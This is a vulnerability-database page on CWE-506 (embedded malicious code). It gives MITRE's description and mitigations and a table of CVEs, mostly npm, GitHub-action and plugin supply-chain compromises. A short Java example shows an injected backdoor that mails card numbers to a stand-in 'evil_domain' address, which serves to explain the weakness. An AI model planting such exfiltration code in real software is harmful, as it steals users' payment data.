
CWE-506 (Embedded Malicious Code) — Vulnerability Class, 78 CVEs

78 vulnerabilities classified as CWE-506 (Embedded Malicious Code). AI-generated Chinese analysis included.

CWE-506 represents a critical integrity weakness where software contains intentionally embedded malicious code, often disguised as legitimate functionality. This flaw typically manifests as Trojan horses, trapdoors, or logic bombs, allowing developers or insiders to subvert system security at a predetermined time or under specific conditions. Exploitation occurs when the hidden code executes, granting unauthorized access, stealing data, or disrupting operations while the primary application appears to function normally. To mitigate this risk, organizations must enforce strict code review processes and utilize automated static analysis tools to detect suspicious patterns. Additionally, implementing robust access controls and maintaining transparent development practices ensure that no hidden backdoors remain in the final product, thereby preserving trust and preventing insider threats from compromising system integrity.

MITRE CWE Description
The product contains code that appears to be malicious in nature. Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.
Common Consequences (1)
Scope: Confidentiality, Integrity, Availability · Impact: Execute Unauthorized Code or Commands
Mitigations (1)
Phase: Implementation, Operation · Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.
Examples (1)
In the example below, a malicious developer has injected code to send credit card numbers to the developer's own email address.

Bad example · Java

boolean authorizeCard(String ccn) {
    // Authorize credit card.
    ...
    // Injected backdoor: exfiltrates the card number to the developer's own address.
    mailCardNumber(ccn, "evil_developer@evil_domain.com");
}
CVSS scores and severities marked (AI) are those the page flags as AI-generated rather than taken from the source advisory; "-" means the page gives no value.

CVE ID | Title | Product | CVSS | Severity | Published
CVE-2026-6443 | Essentialplugin Plugins (Various Versions) - Injected Backdoor | Accordion and Accordion Slider | 9.8 | Critical | 2026-04-17
CVE-2026-34424 | Smart Slider 3 Pro 3.5.1.35 Supply Chain Attack Remote Access Toolkit | Smart Slider 3 Pro for WordPress | 9.8 | Critical | 2026-04-09
CVE-2026-33634 | Trivy ecosystem supply chain briefly compromised | setup-trivy | 7.4 | - | 2026-03-23
CVE-2026-31976 | xygeni-action v5 tag poisoned with C2 backdoor | xygeni-action | 8.8 (AI) | High (AI) | 2026-03-11
CVE-2026-28353 | Trivy Vulnerability Scanner: Unauthorized AI Agent Execution Code Included in OpenVSX Extension Release | trivy-vscode-extension | 5.5 | - | 2026-03-05
CVE-2024-10938 | OVRI Payment 1.7.0 - Malicious .htaccess directive | OVRI Payment | 6.5 | Medium | 2026-02-27
CVE-2025-59374 | ASUS Live Update Security Vulnerability | live update | 8.1 (AI) | High (AI) | 2025-12-17
CVE-2018-25117 | VestaCP Debian Installer Malicious Backdoor Supply Chain Compromise | Control Panel (CP) | 8.8 (AI) | High (AI) | 2025-10-15
CVE-2017-20203 | NetSarang v5.0 Malicious Backdoor Supply Chain Compromise | Xmanager Enterprise | 10.0 (AI) | Critical (AI) | 2025-10-09
CVE-2017-20202 | Web Developer for Chrome v0.4.9 Malicious Backdoor Supply Chain Compromise | Web Developer for Chrome | 8.8 (AI) | High (AI) | 2025-10-08
CVE-2017-20201 | CCleaner v5.33.6162 & CCleaner Cloud v1.07.3191 Malicious Backdoor Supply Chain Compromise | CCleaner | 9.8 (AI) | Critical (AI) | 2025-10-08
CVE-2025-10894 | Nx: nx/devkit: malicious versions of nx and plugins published to npm | - | 9.6 | Critical | 2025-09-24
CVE-2025-59145 | color-name@2.0.1 contains malware after npm account takeover | color-name | 6.1 (AI) | Medium (AI) | 2025-09-15
CVE-2025-59331 | is-arrayish@0.3.3 contains malware after npm account takeover | node-is-arrayish | 8.2 (AI) | High (AI) | 2025-09-15
CVE-2025-59330 | error-ex@1.3.3 contains malware after npm account takeover | node-error-ex | 8.2 (AI) | High (AI) | 2025-09-15
CVE-2025-59162 | color-convert@3.1.1 contains malware after npm account takeover | color-convert | 5.4 (AI) | Medium (AI) | 2025-09-15
CVE-2025-59142 | color-string@2.1.1 contains malware after npm account takeover | color-string | 8.2 (AI) | High (AI) | 2025-09-15
CVE-2025-59144 | debug@4.4.2 contains malware after npm account takeover | debug | 6.1 (AI) | Medium (AI) | 2025-09-15
CVE-2025-59143 | color@5.0.1 contains malware after npm account takeover | color | 6.1 (AI) | Medium (AI) | 2025-09-15
CVE-2025-59141 | simple-swizzle@0.2.3 contains malware after npm account takeover | node-simple-swizzle | 6.1 (AI) | Medium (AI) | 2025-09-15
CVE-2025-59140 | backslash@0.2.1 contains malware after npm account takeover | node-backslash | 6.1 (AI) | Medium (AI) | 2025-09-15
CVE-2025-59039 | Prebid Universal Creative on npm briefly compromised | prebid-universal-creative | 9.8 (AI) | Critical (AI) | 2025-09-09
CVE-2025-59038 | Prebid.js NPM package briefly compromised | Prebid.js | 8.2 (AI) | High (AI) | 2025-09-09
CVE-2025-59037 | DuckDB NPM packages 1.3.3 and 1.29.2 briefly compromised with malware | duckdb-node | 9.1 (AI) | Critical (AI) | 2025-09-09
CVE-2025-8217 | Inert Malicious script injected into Amazon Q Developer Visual Studio Code (VS Code) Extension | Q Developer VS Code Extension | 4.0 | Medium | 2025-07-30
CVE-2025-54313 | eslint-config-prettier Security Vulnerability | eslint-config-prettier | 7.5 | High | 2025-07-19
CVE-2025-32965 | Compromised xrpl.js versions 4.2.1, 4.2.2, 4.2.3, 4.2.4, and 2.14.2 | xrpl.js | 7.5 | - | 2025-04-22
CVE-2025-30154 | Multiple Reviewdog actions were compromised during a specific time period | reviewdog | 8.6 | High | 2025-03-19
CVE-2025-30066 | changed-files Security Vulnerability | changed-files | 8.6 | High | 2025-03-15
CVE-2024-4978 | Malicious Code in Justice AV Solutions (JAVS) Viewer | Viewer | 8.4 | High | 2024-05-23

Vulnerabilities classified as CWE-506 (Embedded Malicious Code) represent 78 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.